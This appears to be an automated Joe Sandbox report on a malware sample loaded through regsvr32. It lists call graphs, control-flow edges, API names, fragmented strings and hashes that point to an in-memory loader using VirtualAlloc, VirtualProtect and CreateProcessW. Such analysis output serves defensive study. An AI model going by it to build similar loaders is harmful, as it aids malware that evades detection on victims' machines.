10267->10268 10389 7fffe231460c 10268->10389 10270 7fffe23124ee SetUnhandledExceptionFilter UnhandledExceptionFilter 10271 7fffe2312516 GetCurrentProcess TerminateProcess 10270->10271 10272 7fffe231250c _invalid_parameter_noinfo 10270->10272 10271->10070 10272->10271 10274 7fffe2312534 wcsftime 45 API calls 10273->10274 10275 7fffe23191c4 10274->10275 10283 7fffe2318f34 10275->10283 10278 7fffe2318e9c 10279 7fffe2312534 wcsftime 45 API calls 10278->10279 10280 7fffe2318ec0 10279->10280 10342 7fffe231895c 10280->10342 10284 7fffe2318f84 GetStringTypeW 10283->10284 10286 7fffe2318fc1 10283->10286 10285 7fffe2318fa6 GetLastError 10284->10285 10287 7fffe2318f9e 10284->10287 10285->10286 10286->10287 10288 7fffe23190f0 10286->10288 10289 7fffe2318fea MultiByteToWideChar 10287->10289 10290 7fffe23190e9 10287->10290 10307 7fffe231e1e8 GetLocaleInfoA 10288->10307 10289->10290 10296 7fffe2319018 10289->10296 10293 7fffe23120e0 __initmbctable 8 API calls 10290->10293 10294 7fffe23147a1 10293->10294 10294->10278 10295 7fffe231914b GetStringTypeA 10295->10290 10298 7fffe231916e 10295->10298 10299 7fffe2316c34 realloc 45 API calls 10296->10299 10302 7fffe231903d __initmbctable wcsftime 10296->10302 10303 7fffe2313024 free 45 API calls 10298->10303 10299->10302 10300 7fffe23190a4 MultiByteToWideChar 10304 7fffe23190c6 GetStringTypeW 10300->10304 10305 7fffe23190db 10300->10305 10302->10290 10302->10300 10303->10290 10304->10305 10305->10290 10306 7fffe2313024 free 45 API calls 10305->10306 10306->10290 10308 7fffe231e21f 10307->10308 10309 7fffe231e21a 10307->10309 10338 7fffe2312100 10308->10338 10311 7fffe23120e0 __initmbctable 8 API calls 10309->10311 10312 7fffe231911a 10311->10312 10312->10290 10312->10295 10313 7fffe231e23c 10312->10313 10314 7fffe231e366 10313->10314 10315 7fffe231e28e GetCPInfo 10313->10315 10318 7fffe23120e0 __initmbctable 8 API calls 10314->10318 10316 7fffe231e2a0 10315->10316 10317 7fffe231e33f MultiByteToWideChar 10315->10317 10316->10317 10319 7fffe231e2aa GetCPInfo 10316->10319 10317->10314 10322 7fffe231e2c5 __wtomb_environ 10317->10322 10320 7fffe2319140 10318->10320 10319->10317 10321 7fffe231e2bf 10319->10321 10320->10290 10320->10295 10321->10317 10321->10322 10323 7fffe2316c34 realloc 45 API calls 10322->10323 10324 7fffe231e301 __initmbctable wcsftime 10322->10324 10323->10324 10324->10314 10325 7fffe231e39d MultiByteToWideChar 10324->10325 10326 7fffe231e3c7 10325->10326 10335 7fffe231e3ff 10325->10335 10327 7fffe231e407 10326->10327 10328 7fffe231e3cc WideCharToMultiByte 10326->10328 10330 7fffe231e439 10327->10330 10331 7fffe231e40d WideCharToMultiByte 10327->10331 10328->10335 10329 7fffe2313024 free 45 API calls 10329->10314 10332 7fffe2313108 __wtomb_environ 45 API calls 10330->10332 10331->10330 10331->10335 10333 7fffe231e446 10332->10333 10334 7fffe231e44e WideCharToMultiByte 10333->10334 10333->10335 10334->10335 10336 7fffe231e477 10334->10336 10335->10314 10335->10329 10337 7fffe2313024 free 45 API calls 10336->10337 10337->10335 10339 7fffe231287c 10338->10339 10340 7fffe23125f8 _wcstoui64_l 67 API calls 10339->10340 10341 7fffe23128a7 10340->10341 10341->10309 10343 7fffe23189b4 LCMapStringW 10342->10343 10346 7fffe23189d8 10342->10346 10344 7fffe23189e4 GetLastError 10343->10344 10343->10346 10344->10346 10345 7fffe2318ca6 10349 7fffe231e1e8 _wcstoui64 67 API calls 10345->10349 10346->10345 10347 7fffe2318a53 10346->10347 10348 7fffe2318c9f 10347->10348 10350 7fffe2318a71 MultiByteToWideChar 10347->10350 10351 7fffe23120e0 __initmbctable 8 API calls 10348->10351 10352 7fffe2318cd4 10349->10352 10350->10348 10360 7fffe2318aa0 10350->10360 10353 7fffe23147d4 10351->10353 10352->10348 10354 7fffe2318e2f LCMapStringA 10352->10354 10355 7fffe2318cf3 10352->10355 10353->10260 10366 7fffe2318d3b 10354->10366 10357 7fffe231e23c _wcstoui64 60 API calls 10355->10357 10356 7fffe2318b1c MultiByteToWideChar 10358 7fffe2318c91 10356->10358 10359 7fffe2318b46 LCMapStringW 10356->10359 10363 7fffe2318d0b 10357->10363 10358->10348 10367 7fffe2313024 free 45 API calls 10358->10367 10359->10358 10364 7fffe2318b70 10359->10364 10361 7fffe2318ad1 wcsftime 10360->10361 10362 7fffe2316c34 realloc 45 API calls 10360->10362 10361->10348 10361->10356 10362->10361 10363->10348 10365 7fffe2318d13 LCMapStringA 10363->10365 10368 7fffe2318bb6 10364->10368 10369 7fffe2318b7b 10364->10369 10365->10366 10372 7fffe2318d42 10365->10372 10370 7fffe2313024 free 45 API calls 10366->10370 10373 7fffe2318e5f 10366->10373 10367->10348 10378 7fffe2316c34 realloc 45 API calls 10368->10378 10387 7fffe2318bd4 wcsftime 10368->10387 10369->10358 10371 7fffe2318b92 LCMapStringW 10369->10371 10370->10373 10371->10358 10379 7fffe2316c34 realloc 45 API calls 10372->10379 10386 7fffe2318d63 __initmbctable wcsftime 10372->10386 10373->10348 10374 7fffe2313024 free 45 API calls 10373->10374 10374->10348 10375 7fffe2318c23 LCMapStringW 10376 7fffe2318c44 WideCharToMultiByte 10375->10376 10377 7fffe2318c83 10375->10377 10376->10377 10377->10358 10384 7fffe2313024 free 45 API calls 10377->10384 10378->10387 10379->10386 10380 7fffe2318dc5 LCMapStringA 10381 7fffe2318df1 10380->10381 10382 7fffe2318ded 10380->10382 10385 7fffe231e23c _wcstoui64 60 API calls 10381->10385 10382->10366 10388 7fffe2313024 free 45 API calls 10382->10388 10384->10358 10385->10382 10386->10366 10386->10380 10387->10358 10387->10375 10388->10366 10389->10270 10391 7fffe2316adf 10390->10391 10392 7fffe2316af6 10390->10392 10393 7fffe2317160 _FF_MSGBANNER 44 API calls 10391->10393 10394 7fffe2316b0b 10392->10394 10396 7fffe231309c __setargv 44 API calls 10392->10396 10395 7fffe2316ae4 10393->10395 10394->10074 10394->10078 10397 7fffe2316f0c _FF_MSGBANNER 44 API calls 10395->10397 10398 7fffe2316b19 10396->10398 10399 7fffe2316aec 10397->10399 10400 7fffe2316b30 10398->10400 10401 7fffe2316b21 10398->10401 10404 7fffe231334c _lock 3 API calls 10399->10404 10403 7fffe2316ba0 _lock 44 API calls 10400->10403 10402 7fffe23167e0 _errno 44 API calls 10401->10402 10402->10394 10405 7fffe2316b3a 10403->10405 10404->10392 10406 7fffe2316b72 10405->10406 10407 7fffe2316b43 10405->10407 10409 7fffe2313024 free 44 API calls 10406->10409 10408 7fffe2317ee4 _lock InitializeCriticalSectionAndSpinCount 10407->10408 10410 7fffe2316b50 10408->10410 10415 7fffe2316b61 LeaveCriticalSection 10409->10415 10412 7fffe2313024 free 44 API calls 10410->10412 10410->10415 10413 7fffe2316b5c 10412->10413 10414 7fffe23167e0 _errno 44 API calls 10413->10414 10414->10415 10415->10394 10417 7fffe231740a EncodePointer 10416->10417 10417->10417 10418 7fffe231741f 10417->10418 10418->9818 10422 7fffe23172d4 10419->10422 10435 7fffe2313364 10422->10435 10437 7fffe2316d01 10436->10437 10438 7fffe2316d33 realloc 10436->10438 10437->10438 10439 7fffe2316d0f 10437->10439 10441 7fffe2316d4b RtlAllocateHeap 10438->10441 10444 7fffe2316d2f 10438->10444 10440 7fffe23167e0 _errno 44 API calls 10439->10440 10442 7fffe2316d14 10440->10442 10441->10438 10441->10444 10443 7fffe23166d8 _invalid_parameter_noinfo 7 API calls 10442->10443 10443->10444 10444->9822 10447 7fffe2312e21 10446->10447 10475 7fffe2312f42 10446->10475 10448 7fffe2312e3c 10447->10448 10449 7fffe2313024 free 45 API calls 10447->10449 10450 7fffe2312e4a 10448->10450 10451 7fffe2313024 free 45 API calls 10448->10451 10449->10448 10452 7fffe2312e58 10450->10452 10453 7fffe2313024 free 45 API calls 10450->10453 10451->10450 10454 7fffe2312e66 10452->10454 10456 7fffe2313024 free 45 API calls 10452->10456 10453->10452 10455 7fffe2312e74 10454->10455 10457 7fffe2313024 free 45 API calls 10454->10457 10458 7fffe2312e82 10455->10458 10459 7fffe2313024 free 45 API calls 10455->10459 10456->10454 10457->10455 10460 7fffe2312e93 10458->10460 10461 7fffe2313024 free 45 API calls 10458->10461 10459->10458 10462 7fffe2312eab 10460->10462 10463 7fffe2313024 free 45 API calls 10460->10463 10461->10460 10464 7fffe2316ba0 _lock 45 API calls 10462->10464 10463->10462 10467 7fffe2312eb5 10464->10467 10465 7fffe2312ee3 10478 7fffe2316a80 LeaveCriticalSection 10465->10478 10467->10465 10469 7fffe2313024 free 45 API calls 10467->10469 10469->10465 10475->9850 10479 7fffe2312050 10482 7fffe22d1000 10479->10482 10483 7fffe22d101e ExitProcess 10482->10483 10484 7fffe2311ee7 10485 7fffe2311f13 RtlAllocateHeap 10484->10485 10486 7fffe2311f5c 10485->10486 10487 7fffe2311f3d RtlDeleteBoundaryDescriptor 10485->10487 10487->10486 10488 180021c3c 10489 180021c97 10488->10489 10492 180001bdc 10489->10492 10491 180021e38 10493 180001c82 10492->10493 10494 180001d21 CreateProcessW 10493->10494 10494->10491 10495 22d0000 10496 22d0183 10495->10496 10497 22d043e VirtualAlloc 10496->10497 10500 22d0462 10497->10500 10498 22d0531 GetNativeSystemInfo 10499 22d056d VirtualAlloc 10498->10499 10503 22d0a7b 10498->10503 10501 22d058b 10499->10501 10500->10498 10500->10503 10502 22d0a00 10501->10502 10505 22d09d9 VirtualProtect 10501->10505 10502->10503 10504 22d0a56 RtlAddFunctionTable 10502->10504 10504->10503 10505->10501

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 8 22d0000-22d0460 call 22d0aa8 * 2 VirtualAlloc 30 22d048a-22d0494 8->30 31 22d0462-22d0466 8->31 34 22d049a-22d049e 30->34 35 22d0a91-22d0aa6 30->35 32 22d0468-22d0488 31->32 32->30 32->32 34->35 36 22d04a4-22d04a8 34->36 36->35 37 22d04ae-22d04b2 36->37 37->35 38 22d04b8-22d04bf 37->38 38->35 39 22d04c5-22d04d2 38->39 39->35 40 22d04d8-22d04e1 39->40 40->35 41 22d04e7-22d04f4 40->41 41->35 42 22d04fa-22d0507 41->42 43 22d0509-22d0511 42->43 44 22d0531-22d0567 GetNativeSystemInfo 42->44 45 22d0513-22d0518 43->45 44->35 46 22d056d-22d0589 VirtualAlloc 44->46 47 22d051a-22d051f 45->47 48 22d0521 45->48 49 22d058b-22d059e 46->49 50 22d05a0-22d05ac 46->50 52 22d0523-22d052f 47->52 48->52 49->50 51 22d05af-22d05b2 50->51 54 22d05b4-22d05bf 51->54 55 22d05c1-22d05db 51->55 52->44 52->45 54->51 56 22d05dd-22d05e2 55->56 57 22d061b-22d0622 55->57 58 22d05e4-22d05ea 56->58 59 22d0628-22d062f 57->59 60 22d06db-22d06e2 57->60 61 22d05ec-22d0609 58->61 62 22d060b-22d0619 58->62 59->60 63 22d0635-22d0642 59->63 64 22d06e8-22d06f9 60->64 65 22d0864-22d086b 60->65 61->61 61->62 62->57 62->58 63->60 68 22d0648-22d064f 63->68 69 22d0702-22d0705 64->69 66 22d0917-22d0929 65->66 67 22d0871-22d087f 65->67 72 22d092f-22d0937 66->72 73 22d0a07-22d0a1a 66->73 74 22d090e-22d0911 67->74 75 22d0654-22d0658 68->75 70 22d06fb-22d06ff 69->70 71 22d0707-22d070a 69->71 70->69 76 22d070c-22d071d 71->76 77 22d0788-22d078e 71->77 79 22d093b-22d093f 72->79 92 22d0a1c-22d0a27 73->92 93 22d0a40-22d0a4a 73->93 74->66 78 22d0884-22d08a9 74->78 80 22d06c0-22d06ca 75->80 81 22d071f-22d0720 76->81 82 22d0794-22d07a2 76->82 77->82 110 22d08ab-22d08b1 78->110 111 22d0907-22d090c 78->111 86 22d09ec-22d09fa 79->86 87 22d0945-22d095a 79->87 84 22d06cc-22d06d2 80->84 85 22d065a-22d0669 80->85 91 22d0722-22d0784 81->91 94 22d085d-22d085e 82->94 95 22d07a8 82->95 84->75 96 22d06d4-22d06d5 84->96 88 22d066b-22d0678 85->88 89 22d067a-22d067e 85->89 86->79 90 22d0a00-22d0a01 86->90 98 22d095c-22d095e 87->98 99 22d097b-22d097d 87->99 100 22d06bd-22d06be 88->100 101 22d068c-22d0690 89->101 102 22d0680-22d068a 89->102 90->73 91->91 105 22d0786 91->105 106 22d0a38-22d0a3e 92->106 108 22d0a4c-22d0a54 93->108 109 22d0a7b-22d0a8e 93->109 94->65 107 22d07ae-22d07d4 95->107 96->60 112 22d096e-22d0979 98->112 113 22d0960-22d096c 98->113 103 22d097f-22d0981 99->103 104 22d09a2-22d09a4 99->104 100->80 118 22d06a5-22d06a9 101->118 119 22d0692-22d06a3 101->119 115 22d06b6-22d06ba 102->115 116 22d0989-22d098b 103->116 117 22d0983-22d0987 103->117 120 22d09ac-22d09bb 104->120 121 22d09a6-22d09aa 104->121 105->82 106->93 124 22d0a29-22d0a35 106->124 139 22d0835-22d0839 107->139 140 22d07d6-22d07d9 107->140 108->109 125 22d0a56-22d0a79 RtlAddFunctionTable 108->125 109->35 122 22d08bb-22d08c8 110->122 123 22d08b3-22d08b9 110->123 111->74 114 22d09be-22d09bf 112->114 113->114 128 22d09c5-22d09cb 114->128 115->100 116->104 126 22d098d-22d098f 116->126 117->114 118->100 127 22d06ab-22d06b3 118->127 119->115 120->114 121->114 130 22d08ca-22d08d1 122->130 131 22d08d3-22d08e5 122->131 129 22d08ea-22d08fe 123->129 124->106 125->109 134 22d0999-22d09a0 126->134 135 22d0991-22d0997 126->135 127->115 136 22d09cd-22d09d3 128->136 137 22d09d9-22d09e9 VirtualProtect 128->137 129->111 147 22d0900-22d0905 129->147 130->130 130->131 131->129 134->128 135->114 136->137 137->86 141 22d083b 139->141 142 22d0844-22d0850 139->142 144 22d07db-22d07e1 140->144 145 22d07e3-22d07f0 140->145 141->142 142->107 146 22d0856-22d0857 142->146 148 22d0812-22d082c 144->148 149 22d07fb-22d080d 145->149 150 22d07f2-22d07f9 145->150 146->94 147->110 148->139 152 22d082e-22d0833 148->152 149->148 150->149 150->150 152->140
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.266862035.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                      • API String ID: 394283112-2517549848
                                                                                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction ID: a2e5ff8b5d7ed8789b7019e511ad120545476bfbc35df10c88a22a44946a1a2c
                                                                                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction Fuzzy Hash: 8D72E530628B498BDB29DF58C8857F9B7E1FB98305F10462DE8CAC7215DB34E646CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                                      • API String ID: 0-464535774
                                                                                                                                      • Opcode ID: af6d23bac9e0564b4dade6cc976aa0f49490c733fc6aa684993268249fb5a7be
                                                                                                                                      • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                                      • Opcode Fuzzy Hash: af6d23bac9e0564b4dade6cc976aa0f49490c733fc6aa684993268249fb5a7be
                                                                                                                                      • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 253 180007958-1800079e2 call 1800142a0 256 1800079e5-1800079eb 253->256 257 1800079f1 256->257 258 180007f68-180007f6e 256->258 261 180007eb7-180007f4d call 180021434 257->261 262 1800079f7-1800079fd 257->262 259 180008084-1800080f6 call 180021434 258->259 260 180007f74-180007f7a 258->260 270 1800080fb-180008101 259->270 265 180007fb4-180008075 call 18001e794 260->265 266 180007f7c-180007f82 260->266 271 180007f52-180007f58 261->271 267 180007d01-180007e4c call 180008738 262->267 268 180007a03-180007a09 262->268 277 18000807a-18000807f 265->277 272 180007f84-180007f8a 266->272 273 180007f9a-180007faf 266->273 267->277 288 180007e52-180007eaf call 18001d408 267->288 274 180007c76-180007cf7 call 180013e28 268->274 275 180007a0f-180007a15 268->275 278 180008103-180008108 270->278 279 18000810d 270->279 280 1800081dd-1800081fd 271->280 281 180007f5e 271->281 283 18000811e-180008124 272->283 284 180007f90-180007f95 272->284 273->256 274->267 285 180007a1b-180007a21 275->285 286 180007b1d-180007c71 call 180018c60 call 180001b1c 275->286 290 180007b0c-180007b18 278->290 291 180008112-18000811b 279->291 281->258 283->280 292 18000812a 283->292 284->256 294 180007a27-180007a2d 285->294 295 18000812f-1800081d8 call 180013e28 285->295 286->291 288->261 290->256 291->283 292->256 294->283 296 180007a33-180007af3 call 18002b4c4 294->296 295->280 303 180007af8-180007b06 296->303 303->290
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 0n)G$9i&$IS_$c)K$oh$oh$J
                                                                                                                                      • API String ID: 0-4168131144
                                                                                                                                      • Opcode ID: a2fd07809090c8a4a54937da8c6413b95d54b2adce31cd57800155d5b9f01661
                                                                                                                                      • Instruction ID: 1745985c1503e7a5a98bbeacef01b65c9f03634c62e3202666f04ad1fcc3199d
                                                                                                                                      • Opcode Fuzzy Hash: a2fd07809090c8a4a54937da8c6413b95d54b2adce31cd57800155d5b9f01661
                                                                                                                                      • Instruction Fuzzy Hash: 69423870A0470CABCB58DF68C58AADEBBF1FB44304F40C169EC4AAB250D7759B19CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 355 180010ff4-180011016 356 180011020 355->356 357 180011022-180011028 356->357 358 180011814 357->358 359 18001102e-180011034 357->359 360 180011819-18001181f 358->360 361 1800114e2-1800114ec 359->361 362 18001103a-180011040 359->362 360->357 363 180011825-180011832 360->363 366 1800114f5-18001151d 361->366 367 1800114ee-1800114f3 361->367 364 1800113e2-1800114d2 call 180008200 362->364 365 180011046-18001104c 362->365 364->363 375 1800114d8-1800114dd 364->375 365->360 369 180011052-18001120b call 180021040 call 1800291ac 365->369 370 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 366->370 367->370 381 180011212-1800113d7 call 1800291ac call 18001e2bc 369->381 382 18001120d 369->382 385 1800117f9-180011803 370->385 375->357 381->363 390 1800113dd 381->390 382->381 385->363 387 180011805-18001180f 385->387 387->357 390->356
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                                      • API String ID: 0-3528011396
                                                                                                                                      • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                      • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                                      • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                      • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 391 180021618-180021653 392 180021655-18002165a 391->392 393 180021bf3-180021c25 392->393 394 180021660-180021665 392->394 395 180021c2a-180021c2f 393->395 396 180021a81-180021bda call 180016314 394->396 397 18002166b-180021670 394->397 398 180021838-180021845 395->398 399 180021c35 395->399 403 180021bdf-180021bee 396->403 400 1800219f3-180021a7c call 180001b1c 397->400 401 180021676-18002167b 397->401 399->392 400->392 404 1800219e4-1800219ee 401->404 405 180021681-180021686 401->405 403->392 404->392 407 1800219d5-1800219df call 18001dfb4 405->407 408 18002168c-180021691 405->408 407->392 410 180021697-18002169c 408->410 411 18002190c-1800219a5 call 18000abac 408->411 414 1800216a2-1800216a7 410->414 415 180021846-180021907 call 180021434 410->415 418 1800219aa-1800219b0 411->418 414->395 419 1800216ad-180021835 call 180008200 call 1800166c0 414->419 415->392 421 1800219b2-1800219c6 418->421 422 1800219cb-1800219d0 418->422 419->398 421->392 422->392
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                                      • API String ID: 0-3036092626
                                                                                                                                      • Opcode ID: af092a803e8c5a8f60e198926b85640c086359e1e86988e2bc1304063bab4e4b
                                                                                                                                      • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                                      • Opcode Fuzzy Hash: af092a803e8c5a8f60e198926b85640c086359e1e86988e2bc1304063bab4e4b
                                                                                                                                      • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 456 180028c20-180028c53 457 180028c58-180028c5e 456->457 458 180028c64-180028c6a 457->458 459 1800290ae-180029147 call 180013e28 457->459 460 1800290a4-1800290a9 458->460 461 180028c70-180028c76 458->461 468 18002914c-180029152 459->468 460->457 464 180029003-18002909f call 180008ea0 461->464 465 180028c7c-180028c82 461->465 464->457 466 180028c88-180028c8e 465->466 467 180028fab-180028ffe call 1800223c4 465->467 470 180028c94-180028c9a 466->470 471 180028df6-180028e1e 466->471 467->457 472 180029154 468->472 473 18002919c-1800291a8 468->473 476 180028d62-180028ddb call 180016bd8 470->476 477 180028ca0-180028ca6 470->477 471->457 479 180028e24-180028e3c 471->479 472->457 489 180028de0-180028de6 476->489 480 180028cac-180028cb2 477->480 481 180029159-180029197 call 1800164c8 477->481 483 180028e42-180028ee6 call 18001d49c 479->483 484 180028ee9-180028f0b 479->484 480->468 487 180028cb8-180028d5d call 180010c00 480->487 481->473 483->484 485 180028f94-180028f95 484->485 486 180028f11-180028f92 call 18001d49c 484->486 492 180028f98-180028f9b 485->492 486->492 487->457 489->473 494 180028dec-180028df1 489->494 492->457 497 180028fa1-180028fa6 492->497 494->457 497->457
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: :G$Q27$_5$yy8x$Mh
                                                                                                                                      • API String ID: 0-3587547327
                                                                                                                                      • Opcode ID: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                                                                                      • Instruction ID: f758bc8895b8ed7f582f71be29fb7142b0f1d07f9cbefdc8313849e51cf7b1d3
                                                                                                                                      • Opcode Fuzzy Hash: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                                                                                      • Instruction Fuzzy Hash: 3DF1E07051434CEBDFA9DF68C8CAA9D3BA0FF48394FA06219FD0696250D775D988CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 499 18000c608-18000c62d 500 18000c632-18000c637 499->500 501 18000cc8a-18000cc8f 500->501 502 18000c63d 500->502 503 18000cc95-18000cc9a 501->503 504 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 501->504 505 18000c643-18000c648 502->505 506 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 502->506 507 18000ce33-18000ced7 call 180008ad8 call 18001c32c 503->507 508 18000cca0-18000cca5 503->508 538 18000cfb4-18000d00a call 1800194a4 504->538 509 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 505->509 510 18000c64e-18000c653 505->510 541 18000cc28-18000cc85 call 1800194a4 506->541 542 18000cedc-18000cf26 call 1800194a4 507->542 513 18000cd35-18000cdce call 18000703c call 18001c32c 508->513 514 18000ccab-18000ccb0 508->514 509->500 516 18000c9c1-18000caa0 call 18002870c call 18001c32c call 1800194a4 510->516 517 18000c659-18000c65e 510->517 556 18000cdd3-18000ce2e call 1800194a4 513->556 521 18000ccb6-18000cd30 call 180021434 514->521 522 18000d00f-18000d014 514->522 516->500 524 18000c664-18000c669 517->524 525 18000c8bb-18000c963 call 180002610 call 18001c32c 517->525 521->500 522->500 539 18000d01a-18000d020 522->539 534 18000c7b2-18000c85a call 180019618 call 18001c32c 524->534 535 18000c66f-18000c674 524->535 564 18000c968-18000c9bc call 1800194a4 525->564 568 18000c85f-18000c8b6 call 1800194a4 534->568 535->522 545 18000c67a-18000c73d call 180002178 call 18001c32c 535->545 538->522 541->500 542->500 574 18000c742-18000c7ad call 1800194a4 545->574 556->500 564->500 568->500 574->500
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +#;)$K'$sf$w\H
                                                                                                                                      • API String ID: 0-1051058546
                                                                                                                                      • Opcode ID: 4270ae10590fc2f5bcc1345d173ce3869455f0ae6b4cef3f0208413052bdacb8
                                                                                                                                      • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                      • Opcode Fuzzy Hash: 4270ae10590fc2f5bcc1345d173ce3869455f0ae6b4cef3f0208413052bdacb8
                                                                                                                                      • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: <4P$<8$<w.
                                                                                                                                      • API String ID: 0-1030867500
                                                                                                                                      • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
